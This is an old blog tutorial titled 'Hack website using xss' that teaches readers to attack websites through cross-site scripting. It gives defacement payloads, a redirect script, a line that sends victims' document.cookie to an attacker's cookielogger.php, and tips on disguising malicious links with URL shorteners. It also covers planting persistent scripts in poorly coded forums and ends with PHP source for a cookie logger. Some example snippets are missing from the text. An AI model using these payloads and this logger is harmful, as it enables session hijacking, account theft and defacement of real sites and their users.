Jumat, 26 November 2010

Hack website using xss

Cross Site Scripting

Cross site scripting allows you to insert malicious code into a website. Normally it is used for javascript, but can also be used for php and html.

For a persistent XSS attack, the user will inject the code into an input in a form. Commonly done in poorly scripted forums.

A temp XSS attack is inserted into the URL, and only executed when someone views a specific link.. An example would be like.

In the previous example, I used

as an example. If the website was vulnerable to XSS, it would popup a messagebox which would say XSS.

XSS exists in almost every website that exists, just because people tend not to sanitize their form inputes.

Injecting HTML into a website via XSS would be done like:

That would just include the bold words XSS onto the webpage somehwere.

To deface a website using XSS, to insert an image you would use the code: 

<IMG SRC="http://mywebsite.com/defacmentpic.jpg">
For a flash video: 
<EMBED SRC="http://mywebsite.com/deface.swf"
For a looping hidden music file: 

<embed src="http://mywebsite.com/deface.mid" hidden autostart="true" loop="true" />
To redirect using XSS

<script>window.open( "http://www.c0rrupt.net/" )</script>

You can even steal cookies and fake a login using XSS.


Well, let me show you. With a little piece of code

document.location = "http://myserver.com/cookielogger.php?c="+document.cookie
That would be the XSS code.

Although, if you're sending someone the link, you're going to want to encrypt the link using: http://ipchanged.com/surf.php?u=Oi8v...BocA%3D%3D&b=7or you could use tinyurl.

For the encryption, you would convert 

But, for your browser to read it, there needs to be some commas in there. 
The are some filters, and they are all possible to bypass. There is a cheat sheet at XSS (Cross Site Scripting) Cheat Sheet

Now, since I've made it seem like you have to send the users a link, I'm going to shine some light on some of your problems. If you happen to know that this person wont click a link, you can still possibly exploit XSS. Some forms on websites, which don't filter, will post something to the website somewhere.. Such as a forum. Say someone who was less than knowledgeable tried to code their own forum... Well, they might have everything working fine. But if you were to try to add XSS into a reply, or new thread.. Or even the name. You might be able to inject your own javascript, into permanent storage.


** Kr3w's Cookie Logger 
** DemonFlyFF.com - First v15 FlyFF Private Server 
$cookie = $_GET['cookie']; 
$referer = $_SERVER['HTTP_REFERER']; 
$browser = $_SERVER['HTTP_USER_AGENT']; 
$redirect = $_GET['redirect']; 
$data = "IP: " . $ip . "\n" 
."Cookie: " . $cookie . "\n" 
."Referrer: " . $referer . "\n" 
."Browser: " . $browser . "\n\n"; 
$log = "cookies.txt"; 
@chmod($log, 0777); 
$f = fopen($log, 'a'); 
fwrite($f, $data); 
@header("Location: $redirect"); 

Notice:Please do not copy this article if you copy it kindly provide a link back to this article.Licensed under creative common licenses

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